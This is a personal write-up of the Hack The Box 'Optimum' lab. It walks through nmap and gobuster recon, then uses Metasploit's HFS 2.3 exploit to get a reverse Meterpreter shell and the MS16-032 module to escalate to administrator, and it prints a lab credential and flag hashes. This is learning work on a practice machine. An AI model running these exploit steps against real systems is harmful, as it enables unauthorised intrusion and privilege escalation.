> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/optimum.md). # Optimum ## TARGET IP: 10.10.10.8 ## HOST IP: 10.10.16.10 ## Recon ### NMAP ``` nmap [Target IP] ```
``` nmap [Target IP] -A -p 80 ```
### HTTP
* Nothing on page source that I could find. * It is using [HttpFileServer 2.3](/htb/machines/easy-machines/stocker.md) * Their latest version is 2.3m
* The login button opens up prompt for login.
* Let's take a crack at logging in with credentails `admin:admin`.
* Discovered new directory `/~login`. This uses a tildy infront. ![](/files/CTFzIGSfLwQWndWPpDSt) ### Vulnerable Software * HFS 2.3 is old and filled with goodies. * Lots of vulnerabilities are mentioned on their own website: ![](/files/aPiceJvvaCcVKHvM6hZh) * Exploit DB has two verified exploits [1](https://www.exploit-db.com/exploits/34668) & [2](https://www.exploit-db.com/exploits/39161). * ## Enumeration ### Gobuster ``` gobuster dir -u http://[Target IP] -w /usr/share/dirb/wordlists/common.txt ```
* Try putting a \~ at the end since we saw that the `/~login` directory had it. ``` gobuster dir -u http://[Target IP]/~ -w /usr/share/dirb/wordlists/common.txt ``` ### WinPEASx64 * Credentials for kostas ![](/files/yXhNqzOV1GFUtAiFfHlL) ``` kdeEjDowkS* ``` * I need to be better at looking through these to see if I could've found more information. ### Browsing * Run the typical commands from the [hacktricks checklist](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation) to see some information on the system. ``` sysinfo ``` * This will tell us the system is Windows 12 Server R2. * This is a 64-bit system. ## Exploit ### Metasploit * Let's check out Metasploit ``` msfconsole search hfs ``` ![](/files/cWd6oW88R5MeWfuS0yhh) ``` use 1 show options ``` ![](/files/g4VLorRwSAYFvNuePGPd) ``` set rhosts [Target IP] set lhost [Host IP] check exploit ``` ![](/files/BYGXJfSNjcEkOdnUO6Il) * Now we have a Meterpreter session. ``` shell whoami ``` ![](/files/Oo5Vjqzo5AOGZAGJjh3J) ``` type C:\Users\kostas\Desktop\user.txt ``` * User Flag ``` b9058357319a5b76f10e01253a382c67 ``` * Next step is to use Metasploit to gain root privileges. I tried browsing the system for a while but didn't find anything useful. The tool I need is a kernel exploit. * When we ran the `sysinfo` command we found the system is a Windows 2012 R2 server which is a 64-bit architecture. The `reverse_tcp_shell` that we are using as our payload is a 32-bit process. We should `migrate` over to a different process that is 64-bit. * On the meterpreter shell run the following. ``` ps ``` ![](/files/SEhE0HTsUvvAktWwUexL) * We see that the `explorer.exe` process is running on `PID 660`. * Let's `migrate` over to this process. ``` migrate [PID for explorer.exe] ``` ![](/files/vY0VEkQKd6hvCatUL8Ac) ![](/files/sCcSjoIA07Jto9I39vTI) * Next, let's `background` the current meterpreter system we have in the system. ``` bg ``` ![](/files/8gkGepxMU014nkAPKMys) * We can confirm this has been backgrounded: ``` sessions ``` ![](/files/v2uhGhuE3IOLNfoH2HAS) * Since we now have access to the windows system, let's see if we can find another metasploit local exploit to root privileges. ``` search exploit/windows/local ``` ![](/files/5Eg4NbXiXPHyM9tfavtQ) * I had to get a hint here and use a Microsoft vulnerability in the system [MS16\_032](https://learn.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032). ``` use 33 ``` ![](/files/GtikN64RvI6AZ7Cb1ZsT) * I'm not sure if winPEASx64 showed this somewhere but I could have also used a tool called [window-exploit-suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester). Here is a [write-up](https://alamot.github.io/optimum_writeup/) on how to use it. It's a bit complicated as you run it on your host system by exporting the target system info. * After selecting our exploit in Metasploit we will then set it up and run it. ``` show options set session 1 set lhost [Host IP] ``` ![](/files/q3c3XdbeVQTXRXhWp55u) ``` exploit ``` ![](/files/HGA23KhRI26tavLozyJC) * We now have a shell to the system as administrator. ``` shell type C:\Users\Administrator\Desktop\root.txt ``` ![](/files/NDAyYekJbYlo9EpQyBlz) ``` 64869e78042316656ffc989ba52d5d2b ``` ## Conclusion * I knew going into this lab that I could use Metasploit. I didn't know when I would get to use it but knew it was an option. I wanted to try to get access to the system without Metasploit but I don't think my level of skill is high enough to do it, let alone understand it. * I need to work on my enumeration skills with Windows systems. I have a far better understanding of them with Linux and could probably spend some more time with Windows. * It was a good lab but I'd really like to finish one of these without help one day. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/optimum.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.